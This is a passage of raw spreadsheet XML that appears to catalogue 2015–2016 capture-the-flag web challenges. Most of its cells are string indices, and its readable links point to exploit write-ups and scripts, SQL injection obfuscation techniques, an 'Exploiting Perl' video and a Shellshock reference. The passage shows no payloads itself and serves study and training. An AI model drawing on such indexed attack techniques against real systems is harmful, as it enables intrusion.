        <v>1351</v>
      </c>
      <c r="G202" s="30" t="s">
        <v>1353</v>
      </c>
      <c r="H202" s="30"/>
      <c r="I202" s="30"/>
      <c r="J202" s="30"/>
    </row>
    <row r="203">
      <c r="A203" s="30" t="s">
        <v>1348</v>
      </c>
      <c r="B203" s="31">
        <v>2015.0</v>
      </c>
      <c r="C203" s="30" t="s">
        <v>1355</v>
      </c>
      <c r="D203" s="30" t="s">
        <v>128</v>
      </c>
      <c r="E203" s="30" t="s">
        <v>25</v>
      </c>
      <c r="F203" s="30" t="s">
        <v>1356</v>
      </c>
      <c r="G203" s="30" t="s">
        <v>1357</v>
      </c>
      <c r="H203" s="30"/>
      <c r="I203" s="30"/>
      <c r="J203" s="30"/>
    </row>
    <row r="204">
      <c r="A204" s="30" t="s">
        <v>1348</v>
      </c>
      <c r="B204" s="31">
        <v>2015.0</v>
      </c>
      <c r="C204" s="30" t="s">
        <v>1358</v>
      </c>
      <c r="D204" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E204" s="30" t="s">
        <v>42</v>
      </c>
      <c r="F204" s="30" t="s">
        <v>92</v>
      </c>
      <c r="G204" s="30" t="s">
        <v>1366</v>
      </c>
      <c r="H204" s="30"/>
      <c r="I204" s="30"/>
      <c r="J204" s="30"/>
    </row>
    <row r="205">
      <c r="A205" s="5" t="s">
        <v>1368</v>
      </c>
      <c r="B205" s="43">
        <v>2015.0</v>
      </c>
      <c r="C205" s="5" t="s">
        <v>1369</v>
      </c>
      <c r="D205" s="5" t="s">
        <v>48</v>
      </c>
      <c r="E205" s="3"/>
      <c r="F205" s="5" t="s">
        <v>1370</v>
      </c>
      <c r="G205" s="5" t="s">
        <v>1371</v>
      </c>
      <c r="H205" s="3"/>
    </row>
    <row r="206">
      <c r="A206" s="5" t="s">
        <v>1368</v>
      </c>
      <c r="B206" s="43">
        <v>2015.0</v>
      </c>
      <c r="C206" s="5" t="s">
        <v>1372</v>
      </c>
      <c r="D206" s="5" t="s">
        <v>128</v>
      </c>
      <c r="E206" s="5" t="s">
        <v>25</v>
      </c>
      <c r="F206" s="5" t="s">
        <v>1375</v>
      </c>
      <c r="G206" s="5" t="s">
        <v>1376</v>
      </c>
      <c r="H206" s="56" t="s">
        <v>1377</v>
      </c>
    </row>
    <row r="207">
      <c r="A207" s="5" t="s">
        <v>1368</v>
      </c>
      <c r="B207" s="43">
        <v>2015.0</v>
      </c>
      <c r="C207" s="5" t="s">
        <v>1381</v>
      </c>
      <c r="D207" s="5" t="s">
        <v>23</v>
      </c>
      <c r="E207" s="5" t="s">
        <v>25</v>
      </c>
      <c r="F207" s="5" t="s">
        <v>1382</v>
      </c>
      <c r="G207" s="5" t="s">
        <v>1383</v>
      </c>
      <c r="H207" s="3"/>
    </row>
    <row r="208">
      <c r="A208" s="96" t="s">
        <v>1368</v>
      </c>
      <c r="B208" s="98">
        <v>2015.0</v>
      </c>
      <c r="C208" s="96" t="s">
        <v>1397</v>
      </c>
      <c r="D208" s="96" t="s">
        <v>48</v>
      </c>
      <c r="E208" s="96" t="s">
        <v>25</v>
      </c>
      <c r="F208" s="96" t="s">
        <v>1400</v>
      </c>
      <c r="G208" s="96" t="s">
        <v>1401</v>
      </c>
      <c r="H208" s="99" t="s">
        <v>1402</v>
      </c>
      <c r="I208" s="100"/>
      <c r="J208" s="100"/>
      <c r="K208" s="100"/>
      <c r="L208" s="100"/>
      <c r="M208" s="100"/>
      <c r="N208" s="100"/>
      <c r="O208" s="100"/>
      <c r="P208" s="100"/>
      <c r="Q208" s="100"/>
      <c r="R208" s="100"/>
      <c r="S208" s="100"/>
      <c r="T208" s="100"/>
      <c r="U208" s="100"/>
      <c r="V208" s="100"/>
      <c r="W208" s="100"/>
      <c r="X208" s="100"/>
      <c r="Y208" s="100"/>
      <c r="Z208" s="100"/>
    </row>
    <row r="209">
      <c r="A209" s="5" t="s">
        <v>1368</v>
      </c>
      <c r="B209" s="43">
        <v>2015.0</v>
      </c>
      <c r="C209" s="5" t="s">
        <v>1423</v>
      </c>
      <c r="D209" s="5" t="s">
        <v>128</v>
      </c>
      <c r="E209" s="5" t="s">
        <v>25</v>
      </c>
      <c r="F209" s="5" t="s">
        <v>1424</v>
      </c>
      <c r="G209" s="5" t="s">
        <v>1426</v>
      </c>
      <c r="H209" s="56" t="s">
        <v>1428</v>
      </c>
    </row>
    <row r="210">
      <c r="A210" s="5" t="s">
        <v>1431</v>
      </c>
      <c r="B210" s="43">
        <v>2015.0</v>
      </c>
      <c r="C210" s="5" t="s">
        <v>1433</v>
      </c>
      <c r="D210" s="5" t="s">
        <v>48</v>
      </c>
      <c r="E210" s="3"/>
      <c r="F210" s="5" t="s">
        <v>1434</v>
      </c>
      <c r="G210" s="5" t="s">
        <v>1436</v>
      </c>
      <c r="H210" s="3"/>
    </row>
    <row r="211">
      <c r="A211" s="5" t="s">
        <v>1431</v>
      </c>
      <c r="B211" s="43">
        <v>2015.0</v>
      </c>
      <c r="C211" s="5" t="s">
        <v>1438</v>
      </c>
      <c r="D211" s="5" t="s">
        <v>23</v>
      </c>
      <c r="E211" s="5" t="s">
        <v>25</v>
      </c>
      <c r="F211" s="5" t="s">
        <v>1400</v>
      </c>
      <c r="G211" s="5" t="s">
        <v>1441</v>
      </c>
      <c r="H211" s="3"/>
    </row>
    <row r="212">
      <c r="A212" s="5" t="s">
        <v>1431</v>
      </c>
      <c r="B212" s="43">
        <v>2015.0</v>
      </c>
      <c r="C212" s="5" t="s">
        <v>1442</v>
      </c>
      <c r="D212" s="5" t="s">
        <v>23</v>
      </c>
      <c r="E212" s="5" t="s">
        <v>25</v>
      </c>
      <c r="F212" s="5" t="s">
        <v>1400</v>
      </c>
      <c r="G212" s="5" t="s">
        <v>1444</v>
      </c>
      <c r="H212" s="3"/>
    </row>
    <row r="213">
      <c r="A213" s="5" t="s">
        <v>1446</v>
      </c>
      <c r="B213" s="43">
        <v>2015.0</v>
      </c>
      <c r="C213" s="5" t="s">
        <v>1448</v>
      </c>
      <c r="D213" s="5" t="s">
        <v>48</v>
      </c>
      <c r="E213" s="5" t="s">
        <v>25</v>
      </c>
      <c r="F213" s="5" t="s">
        <v>1400</v>
      </c>
      <c r="G213" s="5" t="s">
        <v>1451</v>
      </c>
      <c r="H213" s="3"/>
    </row>
    <row r="214">
      <c r="A214" s="5" t="s">
        <v>1453</v>
      </c>
      <c r="B214" s="43">
        <v>2015.0</v>
      </c>
      <c r="C214" s="5" t="s">
        <v>1456</v>
      </c>
      <c r="D214" s="5" t="s">
        <v>23</v>
      </c>
      <c r="E214" s="5" t="s">
        <v>25</v>
      </c>
      <c r="F214" s="5" t="s">
        <v>1457</v>
      </c>
      <c r="G214" s="5" t="s">
        <v>1458</v>
      </c>
      <c r="H214" s="3"/>
    </row>
    <row r="215">
      <c r="A215" s="5" t="s">
        <v>1453</v>
      </c>
      <c r="B215" s="43">
        <v>2015.0</v>
      </c>
      <c r="C215" s="5" t="s">
        <v>1461</v>
      </c>
      <c r="D215" s="5" t="s">
        <v>48</v>
      </c>
      <c r="E215" s="5" t="s">
        <v>25</v>
      </c>
      <c r="F215" s="5" t="s">
        <v>1463</v>
      </c>
      <c r="G215" s="5" t="s">
        <v>1464</v>
      </c>
      <c r="H215" s="3"/>
    </row>
    <row r="216">
      <c r="A216" s="5" t="s">
        <v>1453</v>
      </c>
      <c r="B216" s="43">
        <v>2015.0</v>
      </c>
      <c r="C216" s="5" t="s">
        <v>1465</v>
      </c>
      <c r="D216" s="5" t="s">
        <v>128</v>
      </c>
      <c r="E216" s="5" t="s">
        <v>25</v>
      </c>
      <c r="F216" s="2" t="s">
        <v>1469</v>
      </c>
      <c r="G216" s="5" t="s">
        <v>1471</v>
      </c>
      <c r="H216" s="5" t="s">
        <v>1472</v>
      </c>
    </row>
    <row r="217">
      <c r="A217" s="17">
        <v>42577.0</v>
      </c>
      <c r="B217" s="65"/>
      <c r="C217" s="65"/>
      <c r="D217" s="65"/>
      <c r="E217" s="9"/>
      <c r="F217" s="65"/>
      <c r="G217" s="65"/>
      <c r="H217" s="66"/>
      <c r="I217" s="9"/>
      <c r="J217" s="9"/>
      <c r="K217" s="9"/>
      <c r="L217" s="9"/>
      <c r="M217" s="9"/>
      <c r="N217" s="9"/>
      <c r="O217" s="9"/>
      <c r="P217" s="9"/>
      <c r="Q217" s="9"/>
      <c r="R217" s="9"/>
      <c r="S217" s="9"/>
      <c r="T217" s="9"/>
      <c r="U217" s="9"/>
      <c r="V217" s="9"/>
      <c r="W217" s="9"/>
      <c r="X217" s="9"/>
      <c r="Y217" s="9"/>
      <c r="Z217" s="9"/>
    </row>
    <row r="218">
      <c r="A218" s="30" t="s">
        <v>1473</v>
      </c>
      <c r="B218" s="31">
        <v>2015.0</v>
      </c>
      <c r="C218" s="30" t="s">
        <v>1440</v>
      </c>
      <c r="D218" s="30" t="s">
        <v>1474</v>
      </c>
      <c r="E218" s="30" t="s">
        <v>909</v>
      </c>
      <c r="F218" s="35" t="s">
        <v>1475</v>
      </c>
      <c r="G218" s="30" t="s">
        <v>1476</v>
      </c>
      <c r="H218" s="30" t="s">
        <v>1477</v>
      </c>
    </row>
    <row r="219">
      <c r="A219" s="30" t="s">
        <v>1473</v>
      </c>
      <c r="B219" s="31">
        <v>2015.0</v>
      </c>
      <c r="C219" s="30" t="s">
        <v>1478</v>
      </c>
      <c r="D219" s="30" t="s">
        <v>1474</v>
      </c>
      <c r="E219" s="30" t="s">
        <v>909</v>
      </c>
      <c r="F219" s="35" t="s">
        <v>1480</v>
      </c>
      <c r="G219" s="30" t="s">
        <v>1482</v>
      </c>
      <c r="H219" s="30" t="s">
        <v>1484</v>
      </c>
    </row>
    <row r="220">
      <c r="A220" s="30" t="s">
        <v>1473</v>
      </c>
      <c r="B220" s="31">
        <v>2015.0</v>
      </c>
      <c r="C220" s="30" t="s">
        <v>1485</v>
      </c>
      <c r="D220" s="30" t="s">
        <v>1486</v>
      </c>
      <c r="E220" s="30" t="s">
        <v>300</v>
      </c>
      <c r="F220" s="103" t="s">
        <v>1487</v>
      </c>
      <c r="G220" s="104" t="s">
        <v>1494</v>
      </c>
      <c r="H220" s="33" t="str">
        <f>HYPERLINK("https://ucs.fbi.h-da.de/writeup-defcamp2015-rocket-science-admin-panel-web-200/","script")</f>
        <v>script</v>
      </c>
    </row>
    <row r="221">
      <c r="A221" s="30" t="s">
        <v>1473</v>
      </c>
      <c r="B221" s="31">
        <v>2015.0</v>
      </c>
      <c r="C221" s="30" t="s">
        <v>33</v>
      </c>
      <c r="D221" s="30" t="s">
        <v>1486</v>
      </c>
      <c r="E221" s="30" t="s">
        <v>25</v>
      </c>
      <c r="F221" s="103" t="s">
        <v>1500</v>
      </c>
      <c r="G221" s="104" t="s">
        <v>1501</v>
      </c>
      <c r="H221" s="30" t="s">
        <v>1503</v>
      </c>
    </row>
    <row r="222">
      <c r="A222" s="30" t="s">
        <v>1505</v>
      </c>
      <c r="B222" s="31">
        <v>2015.0</v>
      </c>
      <c r="C222" s="30" t="s">
        <v>1506</v>
      </c>
      <c r="D222" s="30" t="s">
        <v>23</v>
      </c>
      <c r="E222" s="30" t="s">
        <v>909</v>
      </c>
      <c r="F222" s="35" t="s">
        <v>1507</v>
      </c>
      <c r="G222" s="30" t="s">
        <v>1508</v>
      </c>
      <c r="H222" s="35" t="s">
        <v>1139</v>
      </c>
    </row>
    <row r="223">
      <c r="A223" s="30" t="s">
        <v>1509</v>
      </c>
      <c r="B223" s="31">
        <v>2015.0</v>
      </c>
      <c r="C223" s="30" t="s">
        <v>1510</v>
      </c>
      <c r="D223" s="30" t="s">
        <v>128</v>
      </c>
      <c r="E223" s="30" t="s">
        <v>621</v>
      </c>
      <c r="F223" s="106" t="s">
        <v>1511</v>
      </c>
      <c r="G223" s="107" t="s">
        <v>1518</v>
      </c>
      <c r="H223" s="30" t="s">
        <v>1139</v>
      </c>
      <c r="I223" s="30"/>
    </row>
    <row r="224">
      <c r="A224" s="30" t="s">
        <v>1509</v>
      </c>
      <c r="B224" s="31">
        <v>2015.0</v>
      </c>
      <c r="C224" s="30" t="s">
        <v>1530</v>
      </c>
      <c r="D224" s="30" t="s">
        <v>128</v>
      </c>
      <c r="E224" s="108" t="s">
        <v>621</v>
      </c>
      <c r="F224" s="106" t="s">
        <v>1511</v>
      </c>
      <c r="G224" s="107" t="s">
        <v>1533</v>
      </c>
      <c r="H224" s="30" t="s">
        <v>1139</v>
      </c>
      <c r="I224" s="30"/>
    </row>
    <row r="225">
      <c r="A225" s="30" t="s">
        <v>1509</v>
      </c>
      <c r="B225" s="31">
        <v>2015.0</v>
      </c>
      <c r="C225" s="30" t="s">
        <v>1535</v>
      </c>
      <c r="D225" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E225" s="30" t="s">
        <v>621</v>
      </c>
      <c r="F225" s="111" t="s">
        <v>1511</v>
      </c>
      <c r="G225" s="113" t="s">
        <v>1582</v>
      </c>
      <c r="H225" s="33" t="str">
        <f>HYPERLINK("http://www.cc.gatech.edu/~orso/papers/halfond.orso.manolios.FSE06.pdf","Negative Taint Interface")</f>
        <v>Negative Taint Interface</v>
      </c>
      <c r="I225" s="30"/>
    </row>
    <row r="226">
      <c r="A226" s="30" t="s">
        <v>1509</v>
      </c>
      <c r="B226" s="31">
        <v>2015.0</v>
      </c>
      <c r="C226" s="30" t="s">
        <v>1584</v>
      </c>
      <c r="D226" s="30" t="s">
        <v>23</v>
      </c>
      <c r="E226" s="30" t="s">
        <v>25</v>
      </c>
      <c r="F226" s="35" t="s">
        <v>1585</v>
      </c>
      <c r="G226" s="35" t="s">
        <v>1586</v>
      </c>
      <c r="H226" s="49" t="s">
        <v>1587</v>
      </c>
    </row>
    <row r="227">
      <c r="A227" s="30" t="s">
        <v>1588</v>
      </c>
      <c r="B227" s="31">
        <v>2015.0</v>
      </c>
      <c r="C227" s="30" t="s">
        <v>1589</v>
      </c>
      <c r="D227" s="30" t="s">
        <v>1363</v>
      </c>
      <c r="E227" s="30" t="s">
        <v>25</v>
      </c>
      <c r="F227" s="35" t="s">
        <v>1590</v>
      </c>
      <c r="G227" s="30" t="s">
        <v>1591</v>
      </c>
      <c r="H227" s="30"/>
      <c r="I227" s="30"/>
    </row>
    <row r="228">
      <c r="A228" s="30" t="s">
        <v>1588</v>
      </c>
      <c r="B228" s="31">
        <v>2015.0</v>
      </c>
      <c r="C228" s="30" t="s">
        <v>1592</v>
      </c>
      <c r="D228" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E228" s="30" t="s">
        <v>25</v>
      </c>
      <c r="F228" s="35" t="s">
        <v>1511</v>
      </c>
      <c r="G228" s="30" t="s">
        <v>1594</v>
      </c>
      <c r="H228" s="30"/>
    </row>
    <row r="229">
      <c r="A229" s="30" t="s">
        <v>1588</v>
      </c>
      <c r="B229" s="31">
        <v>2015.0</v>
      </c>
      <c r="C229" s="30" t="s">
        <v>1596</v>
      </c>
      <c r="D229" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E229" s="30" t="s">
        <v>25</v>
      </c>
      <c r="F229" s="106" t="s">
        <v>1597</v>
      </c>
      <c r="G229" s="107" t="s">
        <v>1599</v>
      </c>
      <c r="H229" s="30"/>
    </row>
    <row r="230">
      <c r="A230" s="113" t="s">
        <v>1588</v>
      </c>
      <c r="B230" s="115">
        <v>2015.0</v>
      </c>
      <c r="C230" s="113" t="s">
        <v>1604</v>
      </c>
      <c r="D230" s="113" t="s">
        <v>128</v>
      </c>
      <c r="E230" s="113" t="s">
        <v>25</v>
      </c>
      <c r="F230" s="111" t="s">
        <v>1605</v>
      </c>
      <c r="G230" s="113" t="s">
        <v>1606</v>
      </c>
      <c r="H230" s="40" t="s">
        <v>1139</v>
      </c>
    </row>
    <row r="231">
      <c r="A231" s="30" t="s">
        <v>1607</v>
      </c>
      <c r="B231" s="31">
        <v>2015.0</v>
      </c>
      <c r="C231" s="30" t="s">
        <v>1608</v>
      </c>
      <c r="D231" s="30" t="s">
        <v>128</v>
      </c>
      <c r="E231" s="30" t="s">
        <v>42</v>
      </c>
      <c r="F231" s="35" t="s">
        <v>1500</v>
      </c>
      <c r="G231" s="30" t="s">
        <v>1609</v>
      </c>
      <c r="H231" s="33" t="str">
        <f>HYPERLINK("https://github.com/client9/libinjection/blob/master/data/sqli-rsalgado-bhusa2013.txt","Sqli Optimization and Obfuscation Techniques")</f>
        <v>Sqli Optimization and Obfuscation Techniques</v>
      </c>
      <c r="I231" s="30"/>
      <c r="J231" s="30"/>
    </row>
    <row r="232">
      <c r="A232" s="30" t="s">
        <v>1607</v>
      </c>
      <c r="B232" s="31">
        <v>2015.0</v>
      </c>
      <c r="C232" s="30" t="s">
        <v>1615</v>
      </c>
      <c r="D232" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E232" s="30" t="s">
        <v>1616</v>
      </c>
      <c r="F232" s="35" t="s">
        <v>1500</v>
      </c>
      <c r="G232" s="30" t="s">
        <v>1617</v>
      </c>
    </row>
    <row r="233">
      <c r="A233" s="30" t="s">
        <v>1607</v>
      </c>
      <c r="B233" s="31">
        <v>2015.0</v>
      </c>
      <c r="C233" s="30" t="s">
        <v>1618</v>
      </c>
      <c r="D233" s="30" t="s">
        <v>128</v>
      </c>
      <c r="E233" s="30" t="s">
        <v>1619</v>
      </c>
      <c r="F233" s="35" t="s">
        <v>1620</v>
      </c>
      <c r="G233" s="30" t="s">
        <v>1621</v>
      </c>
      <c r="H233" s="33" t="str">
        <f>HYPERLINK("https://www.youtube.com/watch?v=gweDBQ-9LuQ","Video: Exploiting Perl")</f>
        <v>Video: Exploiting Perl</v>
      </c>
    </row>
    <row r="234">
      <c r="A234" s="30" t="s">
        <v>1607</v>
      </c>
      <c r="B234" s="31">
        <v>2015.0</v>
      </c>
      <c r="C234" s="30" t="s">
        <v>1659</v>
      </c>
      <c r="D234" s="30" t="s">
        <v>128</v>
      </c>
      <c r="E234" s="30" t="s">
        <v>1660</v>
      </c>
      <c r="F234" s="35" t="s">
        <v>1590</v>
      </c>
      <c r="G234" s="30" t="s">
        <v>1661</v>
      </c>
      <c r="H234" s="33" t="str">
        <f>HYPERLINK("https://github.com/ctfs/write-ups-2015/tree/master/hack-lu-ctf-2015/web/teachers-pinboard","Detailed Writeup")</f>
        <v>Detailed Writeup</v>
      </c>
    </row>
    <row r="235">
      <c r="A235" s="30" t="s">
        <v>1665</v>
      </c>
      <c r="B235" s="31">
        <v>2015.0</v>
      </c>
      <c r="C235" s="30" t="s">
        <v>1666</v>
      </c>
      <c r="D235" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E235" s="30" t="s">
        <v>909</v>
      </c>
      <c r="F235" s="35" t="s">
        <v>1667</v>
      </c>
      <c r="G235" s="30" t="s">
        <v>1668</v>
      </c>
      <c r="H235" s="40" t="s">
        <v>1139</v>
      </c>
    </row>
    <row r="236">
      <c r="A236" s="30" t="s">
        <v>1665</v>
      </c>
      <c r="B236" s="31">
        <v>2015.0</v>
      </c>
      <c r="C236" s="30" t="s">
        <v>599</v>
      </c>
      <c r="D236" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E236" s="30" t="s">
        <v>300</v>
      </c>
      <c r="F236" s="35" t="s">
        <v>599</v>
      </c>
      <c r="G236" s="30" t="s">
        <v>1671</v>
      </c>
      <c r="H236" s="33" t="str">
        <f>HYPERLINK("http://fadec0d3.blogspot.com/2015/09/mma-ctf-2015-login-as-admin-30.html","writeup and script")</f>
        <v>writeup and script</v>
      </c>
    </row>
    <row r="237">
      <c r="A237" s="30" t="s">
        <v>1665</v>
      </c>
      <c r="B237" s="31">
        <v>2015.0</v>
      </c>
      <c r="C237" s="30" t="s">
        <v>1672</v>
      </c>
      <c r="D237" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E237" s="33" t="str">
        <f>HYPERLINK("http://memcached.org/","memcached backend")</f>
        <v>memcached backend</v>
      </c>
      <c r="F237" s="35" t="s">
        <v>1674</v>
      </c>
      <c r="G237" s="30" t="s">
        <v>1675</v>
      </c>
      <c r="H237" s="33" t="str">
        <f>HYPERLINK("http://lzone.de/cheat-sheet/memcached","memcached cheat sheat")</f>
        <v>memcached cheat sheat</v>
      </c>
    </row>
    <row r="238">
      <c r="A238" s="30" t="s">
        <v>1665</v>
      </c>
      <c r="B238" s="31">
        <v>2015.0</v>
      </c>
      <c r="C238" s="30" t="s">
        <v>1678</v>
      </c>
      <c r="D238" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E238" s="30" t="s">
        <v>25</v>
      </c>
      <c r="F238" s="35" t="s">
        <v>1511</v>
      </c>
      <c r="G238" s="30" t="s">
        <v>1696</v>
      </c>
      <c r="H238" s="33" t="str">
        <f>HYPERLINK("https://wiki.php.net/rfc/remove_alternative_php_tags","alternative php tags")</f>
        <v>alternative php tags</v>
      </c>
    </row>
    <row r="239">
      <c r="A239" s="30" t="s">
        <v>1665</v>
      </c>
      <c r="B239" s="31">
        <v>2015.0</v>
      </c>
      <c r="C239" s="30" t="s">
        <v>1778</v>
      </c>
      <c r="D239" s="30" t="s">
        <v>128</v>
      </c>
      <c r="E239" s="30" t="s">
        <v>25</v>
      </c>
      <c r="F239" s="35" t="s">
        <v>599</v>
      </c>
      <c r="G239" s="30" t="s">
        <v>1791</v>
      </c>
      <c r="H239" s="30" t="s">
        <v>1139</v>
      </c>
    </row>
    <row r="240">
      <c r="A240" s="30" t="s">
        <v>1665</v>
      </c>
      <c r="B240" s="31">
        <v>2015.0</v>
      </c>
      <c r="C240" s="30" t="s">
        <v>1792</v>
      </c>
      <c r="D240" s="30" t="s">
        <v>128</v>
      </c>
      <c r="E240" s="30" t="s">
        <v>25</v>
      </c>
      <c r="F240" s="131" t="s">
        <v>1793</v>
      </c>
      <c r="G240" s="133" t="s">
        <v>1802</v>
      </c>
      <c r="H240" s="33" t="str">
        <f>HYPERLINK("http://mslc.ctf.su/wp/mma-ctf-2015-motto-mijikai-address-cryptoweb-100300/","writeup and script")</f>
        <v>writeup and script</v>
      </c>
    </row>
    <row r="241">
      <c r="A241" s="30" t="s">
        <v>1815</v>
      </c>
      <c r="B241" s="31">
        <v>2015.0</v>
      </c>
      <c r="C241" s="30" t="s">
        <v>1816</v>
      </c>
      <c r="D241" s="30" t="s">
        <v>48</v>
      </c>
      <c r="E241" s="30" t="s">
        <v>909</v>
      </c>
      <c r="F241" s="35" t="s">
        <v>1511</v>
      </c>
      <c r="G241" s="30" t="s">
        <v>1817</v>
      </c>
      <c r="H241" s="30"/>
    </row>
    <row r="242">
      <c r="A242" s="30" t="s">
        <v>167</v>
      </c>
      <c r="B242" s="31">
        <v>2015.0</v>
      </c>
      <c r="C242" s="30" t="s">
        <v>1818</v>
      </c>
      <c r="D242" s="30" t="s">
        <v>23</v>
      </c>
      <c r="E242" s="30" t="s">
        <v>25</v>
      </c>
      <c r="F242" s="30" t="s">
        <v>1819</v>
      </c>
      <c r="G242" s="30" t="s">
        <v>1820</v>
      </c>
    </row>
  </sheetData>
  <mergeCells count="20">
    <mergeCell ref="G170:I170"/>
    <mergeCell ref="F171:G171"/>
    <mergeCell ref="G172:I172"/>
    <mergeCell ref="G177:I177"/>
    <mergeCell ref="G49:H49"/>
    <mergeCell ref="G45:H45"/>
    <mergeCell ref="G46:H46"/>
    <mergeCell ref="G47:H47"/>
    <mergeCell ref="G48:H48"/>
    <mergeCell ref="G157:H157"/>
    <mergeCell ref="G158:I158"/>
    <mergeCell ref="G53:K53"/>
    <mergeCell ref="G52:I52"/>
    <mergeCell ref="G65:K65"/>
    <mergeCell ref="G66:K66"/>
    <mergeCell ref="G67:L67"/>
    <mergeCell ref="G32:H32"/>
    <mergeCell ref="G33:H33"/>
    <mergeCell ref="G34:H34"/>
    <mergeCell ref="G50:H50"/>
  </mergeCells>
  <hyperlinks>
    <hyperlink r:id="rId1" ref="H11"/>
    <hyperlink r:id="rId2" ref="H35"/>
    <hyperlink r:id="rId3" location="Initial_report_.28CVE-2014-6271.29" ref="H59"/>
    <hyperlink r:id="rId4" ref="H88"/>
    <hyperlink r:id="rId5" ref="J91"/>
    <hyperlink r:id="rId6" location="get--db-_all_docs" ref="H92"/>
    <hyperlink r:id="rId7" ref="H97"/>
    <hyperlink r:id="rId8" ref="H114"/>
    <hyperlink r:id="rId9" ref="H126"/>
    <hyperlink r:id="rId10" ref="H131"/>
    <hyperlink r:id="rId11" ref="H135"/>
    <hyperlink r:id="rId12" ref="E136"/>
    <hyperlink r:id="rId13" ref="G142"/>
    <hyperlink r:id="rId14" location="26614530" ref="H143"/>
    <hyperlink r:id="rId15" ref="H145"/>
    <hyperlink r:id="rId16" ref="H148"/>
    <hyperlink r:id="rId17" ref="H176"/>
    <hyperlink r:id="rId18" ref="H179"/>
    <hyperlink r:id="rId19" ref="H185"/>
    <hyperlink r:id="rId20" ref="G186"/>
    <hyperlink r:id="rId21" ref="H186"/>
    <hyperlink r:id="rId22" ref="H187"/>
    <hyperlink r:id="rId23" ref="I187"/>
    <hyperlink r:id="rId24" ref="H191"/>
    <hyperlink r:id="rId25" ref="I192"/>
    <hyperlink r:id="rId26" ref="J192"/>
    <hyperlink r:id="rId27" ref="H206"/>
    <hyperlink r:id="rId28" ref="H208"/>
    <hyperlink r:id="rId29" ref="H209"/>
    <hyperlink r:id="rId30" ref="H220"/>
    <hyperlink r:id="rId31" ref="H225"/>
    <hyperlink r:id="rId32" ref="H231"/>
    <hyperlink r:id="rId33" ref="H233"/>
    <hyperlink r:id="rId34" ref="H234"/>
    <hyperlink r:id="rId35" ref="H236"/>
    <hyperlink r:id="rId36" ref="E237"/>
    <hyperlink r:id="rId37" ref="H237"/>
    <hyperlink r:id="rId38" ref="H238"/>
    <hyperlink r:id="rId39" ref="H240"/>
  </hyperlinks>
  <drawing r:id="rId4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6.14"/>
    <col customWidth="1" min="4" max="4" width="9.86"/>
    <col customWidth="1" min="5" max="5" width="23.14"/>
    <col customWidth="1" min="6" max="6" width="85.86"/>
    <col customWidth="1" min="7" max="7" width="34.86"/>
    <col customWidth="1" min="8" max="8" width="22.14"/>
  </cols>
  <sheetData>
    <row r="1">
      <c r="A1" s="2" t="s">
        <v>0</v>
      </c>
      <c r="B1" s="2" t="s">
        <v>1</v>
      </c>
      <c r="C1" s="2" t="s">
        <v>2</v>
      </c>
      <c r="D1" s="2" t="s">
        <v>3</v>
      </c>
      <c r="E1" s="2" t="s">
        <v>714</v>
      </c>
      <c r="F1" s="2" t="s">
        <v>6</v>
      </c>
      <c r="G1" s="2" t="s">
        <v>7</v>
      </c>
      <c r="H1" s="3"/>
      <c r="I1" s="3"/>
    </row>
    <row r="2">
      <c r="A2" s="6" t="s">
        <v>9</v>
      </c>
      <c r="B2" s="7"/>
      <c r="C2" s="6"/>
      <c r="D2" s="6"/>
      <c r="E2" s="6"/>
      <c r="F2" s="6"/>
      <c r="G2" s="6"/>
      <c r="H2" s="6"/>
      <c r="I2" s="8"/>
      <c r="J2" s="8"/>
      <c r="K2" s="9"/>
      <c r="L2" s="9"/>
      <c r="M2" s="9"/>
      <c r="N2" s="9"/>
      <c r="O2" s="9"/>
      <c r="P2" s="9"/>
      <c r="Q2" s="9"/>
      <c r="R2" s="9"/>
      <c r="S2" s="9"/>
      <c r="T2" s="9"/>
      <c r="U2" s="9"/>
      <c r="V2" s="9"/>
      <c r="W2" s="9"/>
      <c r="X2" s="9"/>
      <c r="Y2" s="9"/>
      <c r="Z2" s="9"/>
    </row>
    <row r="3">
      <c r="A3" s="2" t="s">
        <v>16</v>
      </c>
      <c r="B3" s="11">
        <v>2016.0</v>
      </c>
      <c r="C3" s="2" t="s">
        <v>715</v>
      </c>
      <c r="D3" s="2" t="s">
        <v>23</v>
      </c>
      <c r="E3" s="2" t="s">
        <v>716</v>
      </c>
      <c r="F3" s="2" t="s">
        <v>717</v>
      </c>
      <c r="G3" s="14" t="s">
        <v>718</v>
      </c>
      <c r="H3" s="3"/>
      <c r="I3" s="3"/>
    </row>
    <row r="4">
      <c r="A4" s="2" t="s">
        <v>16</v>
      </c>
      <c r="B4" s="11">
        <v>2016.0</v>
      </c>
      <c r="C4" s="2" t="s">
        <v>719</v>
      </c>
      <c r="D4" s="2" t="s">
        <v>23</v>
      </c>
      <c r="E4" s="2" t="s">
        <v>720</v>
      </c>
      <c r="F4" s="2" t="s">
        <v>722</v>
      </c>
      <c r="G4" s="14" t="s">
        <v>724</v>
      </c>
      <c r="H4" s="3"/>
      <c r="I4" s="3"/>
    </row>
    <row r="5">
      <c r="A5" s="2" t="s">
        <v>16</v>
      </c>
      <c r="B5" s="11">
        <v>2016.0</v>
      </c>
      <c r="C5" s="2" t="s">
        <v>727</v>
      </c>
      <c r="D5" s="2" t="s">
        <v>128</v>
      </c>
      <c r="E5" s="2" t="s">
        <v>728</v>
      </c>
      <c r="F5" s="13" t="s">
        <v>730</v>
      </c>
      <c r="G5" s="63" t="s">
        <v>732</v>
      </c>
      <c r="H5" s="3"/>
      <c r="I5" s="3"/>
    </row>
    <row r="6">
      <c r="A6" s="3"/>
      <c r="B6" s="3"/>
      <c r="C6" s="3"/>
      <c r="D6" s="3"/>
      <c r="E6" s="2" t="s">
        <v>744</v>
      </c>
      <c r="F6" s="2" t="s">
        <v>745</v>
      </c>
      <c r="G6" s="63" t="s">
        <v>746</v>
      </c>
      <c r="H6" s="3"/>
      <c r="I6" s="3"/>
    </row>
    <row r="7">
      <c r="A7" s="3"/>
      <c r="B7" s="3"/>
      <c r="C7" s="3"/>
      <c r="D7" s="3"/>
      <c r="E7" s="3"/>
      <c r="F7" s="2" t="s">
        <v>753</v>
      </c>
      <c r="G7" s="15" t="s">
        <v>755</v>
      </c>
      <c r="H7" s="3"/>
      <c r="I7" s="3"/>
